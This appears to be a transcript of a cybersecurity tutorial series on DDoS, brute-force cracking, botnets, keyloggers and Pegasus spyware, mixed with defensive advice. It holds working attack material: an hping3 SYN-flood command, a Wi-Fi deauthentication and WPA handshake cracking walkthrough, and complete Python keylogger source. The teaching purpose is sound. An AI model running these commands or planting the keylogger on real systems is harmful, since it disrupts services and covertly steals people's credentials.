With work from home being the norm in today's era, people spend a considerable amount of time on the internet, often without specific measures to ensure a secure session. Apart from individuals, organizations worldwide that host data and conduct business over the internet are always at risk of a DDoS attack, and these attacks are getting more extreme as hackers gain easier access to botnets: three of the six strongest DDoS attacks on record were launched in 2021, with the most extreme occurring just the year before, in 2020. Lately, cyber criminals have been actively seeking out new services and protocols for amplifying these DDoS attacks, and active involvement with hacked machines and botnets allows further penetration into the consumer space, enabling much more elaborate attack campaigns. Multinational corporations have had their fair share of problems too: GitHub, a platform for software developers, was the target of a DDoS attack in 2018, widely suspected to have been conducted by Chinese authorities. The attack went on for about 20 minutes before the systems were brought back to a stable condition; it was the strongest DDoS attack to date at the time, and it made a lot of companies reconsider their security practices. Even after years of countermeasures, DDoS attacks are still at large and can affect anyone in the consumer or corporate space.

Let's learn more about what a DDoS attack is. A distributed denial of service attack, or DDoS, is when an attacker — or attackers — attempt to make it impossible for a service to be delivered. This can be achieved by thwarting access to virtually anything: servers, devices, services, networks, applications, and even specific transactions within applications. In a DoS attack, it is one system that sends the malicious data or requests; a DDoS attack comes from multiple systems. Generally, these attacks work by drowning a system with requests for data: sending a web server so many requests to serve a page that it crashes under the demand, or hitting a database with a high volume of queries, until the available internet bandwidth, CPU, and RAM capacity become overwhelmed. The impact can range from the minor annoyance of disrupted services to entire websites, applications, or even whole businesses being taken offline. More often than not, these attacks are launched using machines in a botnet — a network of devices that can be triggered to send requests from a remote source, often known as the command and control center. The bots in the network attack a particular target, thereby hiding the original perpetrator of the DDoS campaign. But how do these devices come under a botnet, and what are the requests being made to the web servers? Let's learn how such an attack works.
A DDoS attack is a two-phase process. In the first phase, a hacker creates a botnet of devices: simply put, a vast network of computers is hacked via malware, ransomware, or plain social engineering. These devices become part of the botnet, which can be triggered at any time to start bombarding a system or server on the instruction of the hacker who created it; the devices in such networks are called bots or zombies. In the second phase, a particular target is selected for the attack. When the hacker finds the right time to strike, all the zombies in the botnet send requests to the target, consuming all of the server's available bandwidth. These can be simple ping requests or complex attacks like SYN flooding and UDP flooding; the aim is to overwhelm the target with more traffic than the server or the network can accommodate, rendering the website or service inoperable.

There is a lot of wiggle room when it comes to the type of DDoS attack a hacker can go with, depending on the target's vulnerabilities, but they fall into three broad categories. Volume-based attacks use massive amounts of bogus traffic to overwhelm a resource — a website or a server — and include ICMP, UDP, and spoofed-packet flood attacks; the size of a volume-based attack is measured in bits per second. These attacks focus on clogging all the bandwidth available to the server, cutting the supply short: a torrent of requests is sent, each of which warrants a reply, leaving the target unable to cater to legitimate users. Next are the protocol-level attacks, which are meant to consume essential resources of the target server: they exhaust the load balancers and firewalls that are supposed to protect the system against such attacks. Protocol attacks include SYN floods and Smurf DDoS, among others, and their size is measured in packets per second. For example, during connection setup the server replies to the hello message sent by the hacker, who plays the client here — but since the IP is spoofed and leads nowhere, the server gets stuck in an endless loop of sending acknowledgements with no end in sight. Finally, there are the application-level attacks, conducted by flooding applications with maliciously crafted requests; their size is measured in requests per second. These are relatively sophisticated attacks that target application- and operating-system-level vulnerabilities: they prevent specific applications from delivering necessary information to users and hog the network bandwidth up to the point of a system crash. Examples include HTTP flooding and BGP hijacking. A single device can request data from a server using HTTP POST or GET without any issue; but when a botnet is instructed to bombard the server with thousands of such requests, the available bandwidth gets jammed and the service eventually becomes unresponsive and unusable.
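Application-layer floods of the kind just described are often caught with a simple sliding-window counter per source IP. A hedged Python sketch; the window size and request budget are invented numbers you would tune against real traffic:

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10      # sliding window length
MAX_REQUESTS = 100       # per-IP budget per window -- purely illustrative

recent = defaultdict(deque)   # ip -> timestamps of that ip's recent requests

def is_flooding(ip, now=None):
    """Record one request from `ip` and report whether it exceeds the budget."""
    now = time.time() if now is None else now
    q = recent[ip]
    q.append(now)
    while q and now - q[0] > WINDOW_SECONDS:   # drop expired timestamps
        q.popleft()
    return len(q) > MAX_REQUESTS

# Simulated burst: the 101st request inside the window trips the detector.
for i in range(105):
    if is_flooding("192.0.2.7"):
        print("rate limit tripped at request", i + 1)
        break
```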
But what about the reasons for such an attack? There are multiple lines of thought as to why a hacker decides to launch a DDoS attack on unsuspecting targets; let's take a look at a few of them. The first is gaining a competitive advantage: many DDoS attacks are conducted by hacking communities against rival groups, and some organizations hire such communities to stagger a rival's resources at the network level and gain an advantage in the playing field. Since being the victim of a DDoS attack indicates a lack of security, the reputation of such a company takes a significant hit, allowing the rivals to cover some ground. Secondly, some hackers launch DDoS attacks to hold multinational corporations to ransom: the resources are jammed, and the only way to clear them is for the target company to pay a designated amount of money to the hackers. Even a few minutes of inactivity is detrimental to a company's reputation in the global market and can cause a spiral effect, both in market value and in its product security index; most of the time a compromise is reached and the resources are freed after a while. DDoS attacks have also found use in the political arena: certain activists use them to voice their opinions, since spreading the word online is much faster than any local rally or forum. Though primarily political, these attacks also target online communities, ethical dilemmas, or protests against corporations.

Let's take a look at a few ways companies and individuals can protect themselves against DDoS attacks. A company can employ load balancers and firewalls to help protect its data. Load balancers reroute traffic from one server to another during an attack, which reduces the single point of failure and adds resiliency to the server data; a firewall blocks unwanted traffic into a system and manages the number of requests made at a definite rate, checking for multiple attacks from a single IP and for occasional slowdowns that reveal a DDoS attack in action. Early detection of an attack goes a long way toward limiting the damage. Once you have detected the attack, you have to respond: for example, work on dropping the malicious DDoS traffic before it reaches your server, so it doesn't throttle and exhaust your bandwidth. This is where you filter the traffic so that only legitimate requests reach the server, and, with intelligent routing, break the remaining traffic into manageable chunks that your cluster resources can handle. The most important stage of DDoS mitigation is looking for patterns of attack and using them to analyze and strengthen your mitigation techniques — blocking an IP that is repeatedly found offending is a first step.

Cloud providers like Amazon Web Services and Microsoft Azure, which offer high levels of cyber security including firewalls and threat-monitoring software, can help protect your assets and network from DDoS criminals. The cloud also has greater bandwidth than most private networks, so it is less likely to fail under the pressure of increased DDoS traffic. Additionally, reputable cloud providers offer network redundancy — duplicate copies of your data, systems, and equipment — so that if your service becomes corrupted or unavailable due to an attack, you can switch to secure access on backed-up versions without missing a beat. One can also increase the amount of bandwidth available to the host server being targeted: since DDoS attacks fundamentally operate on the principle of overwhelming systems with heavy traffic, simply provisioning extra bandwidth to handle unexpected traffic spikes provides a measure of protection, though this solution can prove expensive, as much of that bandwidth will go unused most of the time. Finally, a content delivery network, or CDN, distributes your content and boosts performance by minimizing the distance between your resources and your end users. It stores cached versions of your content in multiple locations, which mitigates DDoS attacks by avoiding a single point of failure when the attacker tries to focus on a single target.
Popular CDNs include Akamai, Cloudflare, AWS CloudFront, and others.

Let's move on to a demo of the effects of such an attack on a system. For this demo we have a single device attacking a target, making it a DoS attack of sorts; once a botnet is ready, multiple devices can do the same and emulate a full DDoS attack. We will use the virtualization software VMware with an instance of the Parrot Security operating system as the attacker; for the target machine, we run another VMware instance of a lightweight Linux distribution known as Linux Lite. On the target device we can use Wireshark to determine when the attack begins and observe its effects. So: Linux Lite is our target machine, and Parrot Security is used by the hacker to launch the attack — just one of the distros that can be used for this.

We must first find the IP address of our target, so we open the terminal, run the command ifconfig, and read off the IP address. Remember, we are launching this attack in VMware, and both the Parrot Security and Linux Lite instances are running on my local network, so the address you see here — 192.168.72.129 — is a private address. This IP cannot be accessed from outside the network, i.e. by anyone not connected to my Wi-Fi; when launching attacks against public servers, the target will have a public IP address that does not belong to the 192.168 private range.

Once we have the IP address, we can use a tool called hping3, an open-source packet generator and analyzer for the TCP/IP protocol suite. To observe the effects of the attack, we use Wireshark, a network traffic analyzer: all traffic passing through the Linux Lite distro is displayed, with the source IP and the destination IP showing where each request is headed. Once the DoS attack is launched, you will see the results coming in here with Parrot Security as the source. To run hping3 we need root access, so we elevate the console with sudo. The hping3 command takes a few arguments; the full line is `sudo hping3 -S --flood -V -p 80 192.168.72.129`. The -S flag specifies SYN packets — as in a TCP handshake, where the client sends a SYN request to the server to initiate a connection. The --flood flag tells hping3 to ignore the replies the server sends back in response to the SYN packets; here Parrot Security is the client and Linux Lite the server. -V stands for verbose, so we see some output while the requests are being sent; -p 80 targets port 80, a number we can change to attack a different port; and finally we give the IP address of our target.

As of right now, Wireshark is relatively quiet and there is no indication of an incoming DoS attack. Once we launch the attack, we see requests coming in from the attacker's IP, 192.168.72.128. At first, the network is still responsive and so is Linux Lite, but the requests keep coming — the SYN flood against port 80 is running in flood mode — and after a few seconds of this, the server will start shutting down.
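What Wireshark shows interactively can also be scripted. A rough sketch using the third-party scapy library (installable via pip; sniffing requires root privileges) — the threshold and timeout here are invented for illustration:

```python
# Count bare SYN packets per source IP, the signature of the flood above.
from collections import Counter
from scapy.all import sniff, IP, TCP

syn_counts = Counter()

def track(pkt):
    if pkt.haslayer(TCP) and pkt[TCP].flags == "S":   # SYN set, ACK clear
        src = pkt[IP].src
        syn_counts[src] += 1
        if syn_counts[src] == 1000:                   # illustrative threshold
            print("possible SYN flood from", src)

# Sniff for 60 seconds; the BPF filter keeps only SYN-without-ACK packets.
sniff(filter="tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack == 0",
      prn=track, store=False, timeout=60)
```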
Now remember, Linux Lite is a lightweight distro, and such Linux distros serve as the backend of many servers across the world. A few seconds into the attack, the system has become completely unresponsive. This happened because of the huge number of requests coming from Parrot Security: whatever I press, nothing responds, and even Wireshark has stopped capturing new requests, because CPU usage is now pinned at 100%. At this point, anyone trying to request information from this Linux distro — or from a server or database that uses it as a backend — cannot access anything. The system has completely stopped responding, and any legitimate request from legitimate users will be dropped. Once we stop the attack, it takes a bit of time for things to settle down: the machine is still out of control for a while, but eventually the traffic dies down and the system regains its strength. It is relatively easy to gauge, right now, the effect of a DoS attack. But remember, this Linux Lite box is just a VM instance; actual website servers and web databases have much more bandwidth, are well secured, and are tough to break into — which is why a single machine cannot do it, and where a DDoS attack comes into play. What we did just now was a DoS attack: a single system penetrating a target server with a single stream of requests. In a DDoS attack, multiple systems — multiple Parrot Security instances, or zombies and bots in a botnet — attack the target server to shut the machine down completely and drop every legitimate request, rendering the service and the target unusable and inoperable. As a final note, we would like to remind you that this is for educational purposes only; we do not endorse attacks on any domain, so only test on servers and networks that you have permission to test on.

Cyber security has become one of the most rigid industries in the last decade, while simultaneously being one of the most challenged. With every aspect of corporate culture going online and embracing cloud computing, there is a plethora of critical data circulating through the internet, all worth billions of dollars to the right person. Rising stakes invite more complex attacks, and one of these is the brute force attack. A brute force attack, also known as brute force cracking, is the cyber-attack equivalent of trying every key on your key ring until you find the right one. Brute force attacks are simple and reliable: no prior knowledge about the victim is needed to start an attack, and many of the systems that fall prey to brute force are otherwise well secured. Attackers let a computer do the work — trying different combinations of usernames and passwords until one works. Because of this repeated trial-and-error format, the strength of the password matters a great deal; still, with enough time and resources, brute force will break a system, since it runs through combinations until it finds the right passcode. Let's learn about brute force attacks in more detail.
A brute force attack, also known as an exhaustive search, is a cryptographic hack that relies on guessing possible combinations of a targeted password until the correct password is discovered. It can be used to break into online accounts, encrypted documents, or even network peripheral devices. The longer the password, the more combinations will need to be tested. A brute force attack can be time-consuming and difficult to perform if methods such as data obfuscation are used — at times downright impossible — but if the password is weak, it could take mere seconds with hardly any effort. Dictionary attacks are an alternative to brute force, where the attacker already has a list of usernames and passwords to test against the target and doesn't need to generate combinations on its own. Dictionary attacks are much more reliable than brute force in a real-world context, but their usefulness depends entirely on the strength of the passwords used by the general population.

There is a three-step process to brute forcing a system; let's go through each step in detail. In step one, we settle on the tool we are going to use. There are some popular names on the market, like Hashcat, Hydra, and John the Ripper; each has its own strengths and weaknesses, but all of them perform well with the right configuration, and all come pre-installed on Linux distributions that cater to penetration testers and cyber security analysts, like Kali Linux and Parrot Security. In step two, having decided on a tool, we start generating combinations of alphanumeric characters, whose only limitation is the number of characters: for example, when using Hydra, a single six-digit password yields 900,000 candidate passwords with only digits involved; add letters and symbols to that sample space and the number grows exponentially. The popular tools allow you to customize this process. Say the hacker knows the password is a specific eight-character word containing only letters and symbols: this substantially increases the chances of guessing the right password, since we avoid the time taken to generate longer candidates and omit digits from the combinations. Small tweaks like these go a long way toward an efficient brute force attack, since running all combinations with no filters dramatically reduces the odds of finding the right credentials in time. In the final step, we run these combinations against the file or service being broken: a specific encrypted document, a social media account, or even devices at home that connect to the internet — say, a Wi-Fi router. The generated passwords are fed into the connection one after another. It is a long and arduous process, but the work is left to the computer rather than someone manually typing and checking each passcode. Any password that doesn't unlock the router is discarded, and the brute force tool simply moves on to the next one; this keeps going until we find the combination that unlocks the router. Sometimes reaching success takes days or weeks, which makes the approach cumbersome for those with little computing power at their disposal — yet the ability to crack any system in the world, purely thanks to bad password habits, is very appealing, and the general public tends to stick with simple, easy-to-use passwords.
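The combinatorics behind step two are easy to verify. A short Python sketch; the character set and the six-character length are illustrative:

```python
import itertools
import string

# Six-digit numeric PINs: 10**6 = 1,000,000 raw combinations
# (900,000 if leading zeros are excluded, as the count above does).
digits_only = itertools.product(string.digits, repeat=6)

# Add lowercase letters and a handful of symbols and the space explodes:
charset = string.digits + string.ascii_lowercase + "!@#$%"
print(len(charset) ** 6)   # 41 ** 6 = 4,750,104,241 combinations

# A brute forcer simply walks this generator, testing each candidate:
for combo in itertools.product(charset, repeat=6):
    candidate = "".join(combo)
    break   # stop immediately here; a real run would test every candidate
```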
Now that we have a fair idea of how brute force works, let's see if we can answer this question. We learned that complex passwords are tougher to crack by brute force: among the passwords listed on the screen, which do you believe would take the longest to break with brute force tools? Leave your answers in the comment section, and we will get back to you with the correct option next week.

Let's move on to the harmful effects of having a system compromised by brute force. A hacked laptop or mobile can have social media accounts logged in, giving the hackers free access to the victim's connections; it has been reported on multiple occasions that compromised Facebook accounts send malicious links and attachments to the people on their friends lists. This points to one of the significant reasons for hacking: malware infusion is best done when spread from multiple devices, similar to distributing spam, as this reduces the chance of tracing it back to the single device belonging to the hacker. Once brute forced, a system can spread malware via email attachments, shared links, file uploads over FTP, and so on. Personal information — credit card data, usage habits, private images and videos — is all stored on our systems, be it in plain format or in root folders; a compromised laptop means easy access to this information, which can further be used to impersonate the victim for bank verification, among other things. A hacked system can also be used as a mail server that distributes spam across lists of victims: since the hacked machines all have different IP addresses and MAC addresses, it becomes challenging to trace the spam back to the original hacker.

With so many harmful implications arising from a brute force attack, it is imperative that the general public be protected. Let's learn about some of the ways we can avoid becoming victims. Passwords consisting of letters, numbers, and symbols have a much higher chance of withstanding brute force attacks, thanks to the sheer number of combinations they can produce; the longer the password, the less likely it is that a hacker will devote the time and resources to brute force it. Having alphanumeric passwords also lets the user keep different passwords for different websites, ensuring that if a single account or password is compromised in a breach or a hack, the remaining accounts are isolated from the incident. Two-factor authentication involves receiving a one-time password on a trusted device before a new login is allowed; this OTP can arrive via email, SMS, or a dedicated 2FA application. Email- and SMS-based OTPs are considered relatively less secure nowadays, owing to how easily SIM cards can be duplicated and mailboxes hacked; applications made specifically for 2FA purposes are much more reliable and secure. CAPTCHAs are used to stop bots from running through web pages, precisely to prevent brute forcing of a website: since brute force tools are automated, forcing the hacker to solve a CAPTCHA manually for every iteration of a password is very challenging, and the CAPTCHA system filters out the automated bots that keep refreshing the page with different credentials, reducing the chances of brute force considerably. Finally, a rule that locks the account under attack for 30 minutes after a specified number of attempts is a good way to prevent brute force attempts: many websites lock an account for 30 minutes after three failed password attempts, and, as an additional note, some also send the user an email informing them that there have been three suspicious attempts to log into the website.
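The lockout rule is a few lines of logic. A minimal Python sketch, assuming an in-memory store (a real site would persist this and also email the user, as described above):

```python
import time

MAX_ATTEMPTS = 3
LOCKOUT_SECONDS = 30 * 60        # a 30-minute lockout, as many sites use

failed = {}                      # username -> (failure count, last failure time)

def record_failure(user):
    count, _ = failed.get(user, (0, 0.0))
    failed[user] = (count + 1, time.time())

def is_locked(user):
    count, last = failed.get(user, (0, 0.0))
    if count >= MAX_ATTEMPTS and time.time() - last < LOCKOUT_SECONDS:
        return True
    if count >= MAX_ATTEMPTS:
        failed.pop(user, None)   # lockout expired; reset the counter
    return False

for _ in range(3):
    record_failure("jane")
print(is_locked("jane"))         # True -- the third failure locks the account
```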
Let's look at a demonstration of how brute force attacks work in a real-world situation. The world has gone wireless, with Wi-Fi taking the reins in every household, so naturally its security will always be up for debate. To further test that security index and understand brute force attacks, we will attempt to break the password of a Wi-Fi router. For that to happen, we first need to capture a handshake file — the connection exchange between the Wi-Fi router and a connecting device such as a mobile or a laptop. The operating system used for this process is Parrot, a Linux distribution catering to penetration testers; all the tools used in this demo come pre-installed on it.

To start our demo, we use a tool called airgeddon, which is made specifically for auditing wireless networks. At this point, it checks that all the scripts it needs to crack into a Wi-Fi network are installed on the system. To capture the handshake file we need an external network card; its significance is that it supports both a managed mode and a monitor mode. The card named wlx1 is my external network adapter, which I select. To be able to capture data over the air, we need to put it in monitor mode — as shown above, it is currently in managed mode — so we select option two, which puts the interface in monitor mode, and its name is now wlan0mon. Monitor mode is the reason we need the external card: many of the built-in cards that ship with laptops and desktops cannot be put into monitor mode.

Once the mode is set, we go into the fifth menu, the handshake tools menu. The first step is to explore for targets — monitor mode is required to select a target — so we start exploring and let it run for about 60 seconds to get a fair idea of the networks currently active in this locality. The ESSID is the Wi-Fi name you see when connecting to a network ("Jio24", "recover me", and so on) — the names that appear on your mobile when searching for Wi-Fi. The BSSID is an identifier, somewhat like a MAC address, that distinguishes one network from other devices. The channel column shows which of the many channels each network operates on. We can also see a client connected to one of these networks: the station entry ending 5626 is the MAC address of a device connected to a router, and its BSSID column tells us which Wi-Fi it is connected to — 58:95:D8..., which is the Jio24 router. So we already know which router has a device connected to it, and we can aim our attack at capturing that handshake.

After the scan has run for a minute, we press Ctrl-C and are asked to select a target. Network 5, the Jio24 router, is already highlighted as the one with clients, which makes it easy to attack and capture a handshake from, so we select network 5 and run a handshake capture. The tool reports that a valid WPA/WPA2 target is selected and that the script can continue. To capture the handshake, we have a couple of attacks available, such as a deauth or aireplay attack. What this attack does is kick the clients off the network; when they try to reconnect to the Wi-Fi — clients are configured to reconnect immediately after being disconnected — the tool captures the handshake file, which contains the material tied to the security key used to initiate the handshake. For our demo, let's go with the second option, the deauth aireplay attack, set a timeout value of, say, 60 seconds, and start the script. We can see it capturing data from the Jio24 network — and there we go, we have the WPA handshake. Once the handshake file is captured, we can close the window: congratulations, it has verified that a PMKID from the target network has been successfully captured. The capture is stored as a .cap file; we give a path — say, the desktop — and the handshake file is written. We can already see the target listed: the same Jio24 router with its BSSID.

Returning to the main menu, we now have the handshake capture with us, and our job is to brute force it. The capture file is protected with the security key of the Wi-Fi network: if we manage to crack it, we automatically obtain the security key. So we go to the offline WPA/WPA2 decrypt menu; since we are cracking a personal network, we choose option one. To run the brute force, we have two options: aircrack or hashcat. Let's go with aircrack plus crunch — a brute force attack against the handshake file — which is option two. It auto-detects the capture file we generated, so we confirm, and the BSSID shown denotes the Jio24 router, so we confirm that as well. Next, the key length: the tool already knows that a WPA2-PSK Wi-Fi security key is always at least 8 characters and at most 64, so we must pick something within that range. If we happen to know the password is at least 10 characters, we set the minimum length to 10, and as a rough guess we set the maximum to 20. The character set we choose for checking the password affects the time the brute force will take: if we have seen the user type a password containing, say, only certain kinds of characters while connecting to the router, we can choose accordingly. Let's go with uppercase letters and numeric characters — option seven — and it starts cracking. You can watch how aircrack works right here in the passphrase display: it starts from the last character and works its way along, trying every single combination — the fourth character from the right will eventually roll over to the next value as every position is cycled through. This keeps going until every combination has been tested. Since the handshake capture is tied to the security key — the WPA2 key of the router — whichever passphrase checks out against the handshake completely is the key of the Wi-Fi router. This is the way brute force can be used against Wi-Fi routers anywhere in the world.
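The charset choice matters because the keyspace grows exponentially with password length. A back-of-the-envelope Python sketch; the guessing rate is purely an assumption:

```python
charset_size = 26 + 10           # uppercase letters + digits, as chosen above
rate = 100_000                   # guesses per second -- purely illustrative

for length in (8, 10, 20):
    keys = charset_size ** length
    years = keys / rate / (60 * 60 * 24 * 365)
    print(f"length {length}: {keys:.2e} keys, ~{years:,.1f} years at {rate:,}/s")
```

Even at this hypothetical rate, an 8-character key in this charset is crackable within about a year, a 10-character key takes over a millennium, and a 20-character key is out of reach — which is why the demo's minimum/maximum length guesses matter so much.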
Cyber attacks are frequently making headlines in today's digital environment, and at any time anyone who uses a computer could become the victim of one. There are various sorts of cyber attacks, ranging from phishing to password attacks; here we'll look into one such threat, known as the botnet.

To begin, let's take a look at some famous botnet attacks. The first is the Mirai botnet, a malicious program designed to attack vulnerable IoT devices and infect them to form a network of bots that, on command, perform basic and medium-level denial of service attacks. Then there is the Zeus bot, specifically designed to attack systems for bank-related information and data.

Now let's see what exactly a botnet is. A botnet refers to a network of hijacked, interconnected devices implanted with malicious code known as malware. Each of these infected devices is known as a bot, and the hijacking criminal — known as the bot herder — controls them remotely. The bots are used to automate large-scale attacks, including data theft, server failure, malware propagation, and denial of service attacks.

Now that we know what a botnet is, let's dive deeper into how one works. Preparing a botnet network involves three steps: first, the botnet army is prepared; after that, the connection between the botnet army and the control server is established; and in the end, the attack is launched by the bot herder. As an illustration: the bot herder initiates the attack, the control server relays the commands, and the devices infected with the malware programs begin attacking the chosen system.

Let's look at the preparation of the botnet army in detail. The first step is prepping the botnet army: the first move in creating a botnet is to infect as many connected devices as possible, ensuring there are enough bots to carry out the attack. Bots are created either by exploiting security gaps in software or websites or by using phishing attacks, and they are often deployed through Trojan horses. The next step is establishing the connection: once a device has been hacked as in the previous step, it is infected with a specific piece of malware that connects it back to the control server, and the bot herder uses command programming to drive the bots' actions. The last step is launching the attack: once infected, a bot allows access to admin-level operations such as gathering and stealing data, reading and rewriting system data, monitoring user activity, and performing denial of service attacks, among other cyber crimes.

Now let's take a look at botnet architecture. The first type is the client-server model: the traditional model, which operates with the help of a command and control (C&C) server and communication protocols like IRC. When the bot herder issues a command to the server, it is relayed to the clients to perform the malicious actions. Then there is the peer-to-peer model: here, controlling the infected bots involves a peer-to-peer network that relies on a decentralized approach — the bots are topologically interconnected and act as both C&C server and client. Hackers today favor this approach to avoid detection and the single point of failure.

In the end, let's review some countermeasures against botnet attacks. The first step is to keep drivers and the operating system updated. After that, we should avoid clicking the random pop-ups and links
and lastly, having certified antivirus and anti-spyware software and a firewall installed on the system will protect against malware attacks.

The internet is an endless source of information and data, yet we still come across occurrences like cyber attacks, hacking, and forced entry that can affect our time on the web. Next we will discuss a topic that secretly records our input data: keyloggers.

To understand the keylogging problem better, let's take a look at an example. This is June; she works in a business firm where she regularly manages the company's data. This is Jacob from the information department, who is here to inform her about some security protocols. During the briefing, she told him about problems her system was facing, including slow reaction speed and unusual internet activity. As Jacob heard about these problems, he considered what could be behind them, and the conclusion he came to was a keylogging issue. Unaware of the problem her system was facing, she asked him for some details. So, for this topic, we will learn what exactly keyloggers are, how they affect a system, and what harmful effects keylogging can bring.

To begin, what exactly is a keylogging program? As the name suggests, a keylogger is a malicious program or tool designed to record the keystrokes typed during data input into a log file. The same program then secretly sends these log files back to its origin, where the hacker can use them for malicious acts.

Now that we know what a keylogger is, let's look at how they enter a system. Searching for a suitable driver for the system can lead to the installation of a keylogging program; so can visiting suspicious sites and installing uncertified software; opening unknown links or unknown websites that arrive from unknown addresses can also be a way in; and lastly, the pop-ups we often see on social and media sites can lead to the installation of a keylogging program.

Next, how do we identify whether a system is infected by a keylogger? The issue can be identified when the keyboard often lags behind the system; when the data we enter sometimes gets stuck mid-input as we type; when the system freezes with no apparent reason; when applications running on the system show delayed reaction times; and lastly, when we see suspicious internet activity on the system that we don't know about.

Now we'll take a look at the different types of keyloggers out there, each of which can harm a system differently. The first is API-based, the most common keylogging case, which uses APIs to keep a log of the typed data and share it with its
origin for malicious purposes; each time we press a key, the keylogger intercepts the signal and logs it. Then we have form-grabbing keyloggers: as the name suggests, these store form data, so if we use web forms or other kinds of forms to enter data, the program can record it and send it to its origin. Then we have kernel-based keyloggers, which are installed deep inside the operating system, where they can hide from antivirus tools if not checked properly while recording the data we type on the keyboard and sending it to their origin. And lastly we have hardware keyloggers, which sit directly in the hardware: they are embedded into the system, where they record the data we type on the keyboard.

Now let's look at how hackers sort the different types of recorded data and exploit them. When hackers receive information about a target, they might use it for blackmail, which can affect the target's personal life and be leveraged for various money-related demands. Company data recorded by a keylogging program can affect the economic value of the company in the market, which may even lead to the company's downfall. And in some cases a keylogging program can log data about military secrets, which may include nuclear codes or the security protocols necessary to maintain a country's security.

Do mobile devices get infected with keyloggers too? On handheld devices, keylogger infection is low in comparison to computer systems, as they use on-screen or virtual keyboards. But we do see malicious programs getting installed on handheld devices when visiting uncertified, illegal, or torrent sites, and a device infected with a keylogger or another malicious program can lead to the exploitation of data, including photos, emails, or important files, by the hacker or cyber criminal who installed it.

Now, to prevent our system from getting infected by a keylogging program, let's look at a few points. The first is to use antivirus software or tools that can prevent malicious programs from entering the system; keeping system security protocols regularly updated is also a good habit; and lastly, use a virtual keyboard to input sensitive data such as bank details, login details, or passwords for different websites.

Now that we have some understanding of keyloggers, let's walk through a demo to deepen it. For the first step, we have to install the required library; when we run the install, the system reports the library is already present. From this library we import the keyboard components that will help us record what is typed: the Key and Listener modules, plus Python's logging module, which will record the data into a log file. Next we write a piece of code that saves the data recorded by the program into a text file named key_log.txt, along with a date and time stamp, and we set the format in which the data is recorded into the log file: the message together with its timestamp. For the next step, we design the two functions the program uses: an on-press function, which comes into play when a keyboard key is pressed and logs the pressed key, in the format defined above, as a string in the log file; and an on-release function, which comes into play when the Escape key is pressed, at which point the program terminates and stops running. In the end, for the program to work, we need to loop these functions: on-press and on-release are passed to a Listener, and joining its thread keeps storing the keystrokes into the log file.

Now that the code is complete, let's run it; we wait a moment while the program starts. To verify it, we open Notepad and type "hello world" as a basic check of whether the program is working. We go back to the main page in the Jupyter notebook, refresh, and scroll to the bottom: there is key_log.txt, the text file we created. Opening it, we find the recorded data, starting with Notepad and then the "hello world" we just typed, which shows that the program we created is working properly.
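The walkthrough above describes the code without showing it, so here is a minimal reconstruction of the demo. It assumes the library in question is pynput (pip install pynput), since the Key and Listener modules described match its API; run it only on your own machine, for learning purposes.

```python
# A minimal sketch of the keylogger built in the demo, assuming pynput.
# For educational use on your own machine only.
import logging
from pynput.keyboard import Key, Listener

# Record each keystroke into key_log.txt with a date and time stamp.
logging.basicConfig(filename="key_log.txt",
                    level=logging.DEBUG,
                    format="%(asctime)s: %(message)s")

def on_press(key):
    # Called whenever a key is pressed; log it as a string.
    logging.info(str(key))

def on_release(key):
    # Called whenever a key is released; Esc terminates the program.
    if key == Key.esc:
        return False

# Loop the two functions via a Listener and block until it stops.
with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```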
Now that we have reached the end of this module, let's summarize. We learned what exactly keyloggers are; the different ways a system gets infected with a keylogging problem; how to detect the problem on our system; the different types of keyloggers out there; how hackers use the data recorded by the program; whether mobile devices get infected with keyloggers; and lastly, what steps can be taken to prevent a keylogger from entering the system.

Before we learn about the Pegasus platform, let us understand what spyware is and how it works. Spyware is a category of malware that can gather information about a user or a device straight from the host machine. It is mostly spread by malicious links via email or chat applications; when a link carrying the malware is received, clicking it activates the spyware, which allows the hacker to spy on all the user's information. With some spyware systems, even clicking the link isn't necessary to trigger the malicious payload. This can ultimately cause security complications and further loss of privacy.

One such spyware system making the rounds in the tech industry today is Pegasus. Pegasus is a spyware system developed by an Israeli company known as the NSO Group. It runs mainly on mobile devices, spanning the major operating systems: Apple's iOS on the iPhone and standard Android. This is not a newly developed platform, since Pegasus has existed since as early as 2016. A highly intricate spyware program that can track user location, read text messages, scan through files on the phone, and access the device's camera and microphone to record voice and video, Pegasus has all the tools necessary to enforce surveillance for any client that wishes to buy its services.

Initially, the NSO Group designed the software to be used against terrorist factions of the world; with more and more encrypted communication channels coming to the forefront, Pegasus was designed to maintain control over data transmission that could be a threat to national security. Unfortunately, the people who bought the software had complete control over whom, how, and to what level they could put under surveillance, and eventually the primary clients became sovereign nations. Spying on information that is supposed to stay private became really easy with this service, and multiple devices can be infected with the same spyware system to create a network of information that keeps feeding data to the host.

To understand how such a network is created, let's see how a mobile device can be infected by Pegasus. We all communicate with friends and family over instant messaging applications and email. If you check your inbox on a regular basis, you must have noticed spam emails that providers like Gmail and Yahoo filter into the spam folder. Some of these messages bypass the filter and make their way into a person's inbox, looking like generic emails that are supposed to be safe.
Pegasus spyware targets exactly such occurrences, passing malicious messages and links that install the spy software on the user's mobile device, be it Android or an iPhone. This isn't unique to the email ecosystem, either: you are equally likely to be targeted over SMS text, WhatsApp, Instagram, or even the most secure messaging apps like Signal and Threema. Once the malicious link is clicked, a spyware package is downloaded and installed on the device. After the spyware is successfully installed, the perpetrator who sent the payload can monitor everything the user does. Pegasus can collect private emails, passwords, images, videos, and every other piece of information that passes through the device's network, and all this data is transmitted back to a central server where the spying organization can monitor the activities at a granular level. This is not even surface level, since complex spyware like Pegasus can access the root files on our phones; these root files hold information crucial to the working of the Android and iOS operating systems, and leaking such private information is a massive blow to an individual's security and privacy. Information that may seem trivial, like the name of your Wi-Fi connection or the last time you ordered an item from Amazon, is all valuable.

This exploitation is primarily possible due to zero-day vulnerabilities: bugs in the software development process that have only just been discovered by an independent security company or a researcher. Once they are found, reporting these vulnerabilities to the developer of the platform, which would be Google for Android or Apple for iOS, is the right thing to do; however, many such critical bugs make their way onto the dark web, where hackers can use them to create exploits. These exploits are then sent to innocent users with a link or a message, as discussed before. Pegasus was able to infect the latest devices with all the security patches installed, because some bugs are not reported to the developers or simply cannot be fixed without breaking some core functionality; these become the gateway for spyware to enter the system. You can never be 100% safe, but you sure can give it your all in protecting yourself.

The one place where Pegasus stands out is its zero-click feature. Usually, in spam emails, the malicious code is activated when the user clicks the malware link; in the new version of Pegasus and a few other spyware programs, a user doesn't need to click the link at all. Once the message arrives in the inbox of WhatsApp, Gmail, or any other chat application, the spyware is activated, and everything can be recorded and sent back to the central server.

